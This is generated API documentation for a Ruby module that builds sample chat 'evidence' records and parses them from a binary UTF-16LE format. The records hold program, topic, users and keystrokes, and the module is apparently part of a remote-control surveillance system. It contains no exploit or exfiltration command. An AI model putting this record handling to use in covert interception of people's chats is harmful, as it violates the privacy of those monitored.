Module: RCS::ChatoldEvidence

Includes:
Tracer
Defined in:
lib/rcs-common/evidence/chat.rb

Constant Summary collapse

ELEM_DELIMITER = 
0xABADC0DE
KEYSTROKES = 
["привет мир", "こんにちは世界", "Hello world!", "Ciao mondo!"]

Constants included from Tracer

Tracer::TRACE_YAML_NAME

Instance Method Summary collapse

Methods included from Tracer

#thread_name, #trace, #trace_ensure_log_folders, #trace_init, #trace_named_put, #trace_named_remove, #trace_nested_pop, #trace_nested_push, #trace_setup

Instance Method Details

#contentObject 



206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
 
# File 'lib/rcs-common/evidence/chat.rb', line 206

def content
  program = ["MSN", "Skype", "Yahoo", "Paltalk", "Sticazzi"].sample.to_utf16le_binary_null
  topic = ["Chatting...", "New projecs", "Fuffa", "Bubbole"].sample.to_utf16le_binary_null
  users = ["ALoR, Daniel", "Bruno, Fulvio", "Naga, Quez", "Tizio, Caio"].sample.to_utf16le_binary_null
  content = StringIO.new
  t = Time.now.getutc
  content.write [t.sec, t.min, t.hour, t.mday, t.mon, t.year, t.wday, t.yday, t.isdst ? 0 : 1].pack('l*')
  content.write program
  content.write topic
  content.write users
  content.write KEYSTROKES.sample.to_utf16le_binary_null
  content.write [ ELEM_DELIMITER ].pack('L')

  content.string
end

#decode_content(common_info, chunks) ⇒ Object 



228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
 
# File 'lib/rcs-common/evidence/chat.rb', line 228

def decode_content(common_info, chunks)
  stream = StringIO.new chunks.join

  until stream.eof?
    tm = stream.read 36
    #trace :info, "CHAT Time.gm #{tm.unpack('l*')}"
    info = Hash[common_info]
    info[:da] = Time.gm(*(tm.unpack('L*')), 0)
    info[:data] = Hash.new if info[:data].nil?
    info[:data][:program] = ''
    info[:data][:topic] = ''
    info[:data][:peer] = ''
    info[:data][:content] = ''

    program = stream.read_utf16le_string
    info[:data][:program] = program.utf16le_to_utf8 unless program.nil?
    #trace :info, "CHAT Program #{info[:data][:program]}"
    topic = stream.read_utf16le_string
    info[:data][:topic] = topic.utf16le_to_utf8 unless topic.nil?
    #trace :info, "CHAT Topic #{info[:data][:topic]}"
    users = stream.read_utf16le_string
    info[:data][:peer] = users.utf16le_to_utf8 unless users.nil?
    #trace :info, "CHAT Users #{info[:data][:users]}"
    keystrokes = stream.read_utf16le_string
    info[:data][:content] = keystrokes.utf16le_to_utf8 unless keystrokes.nil?
    
    begin
      info[:data][:content] = JSON.parse info[:data][:content]
    rescue Exception => e
      # leave content as is
    end
    
    delim = stream.read(4).unpack("L*").first
    raise EvidenceDeserializeError.new("Malformed CHAT OLD (missing delimiter)") unless delim == ELEM_DELIMITER

    #puts "decode_content #{info}"

    yield info if block_given?
  end
  :delete_raw
end

#generate_contentObject 



222
223
224
225
226
 
# File 'lib/rcs-common/evidence/chat.rb', line 222

def generate_content
  ret = Array.new
  10.rand_times { ret << content() }
  ret
end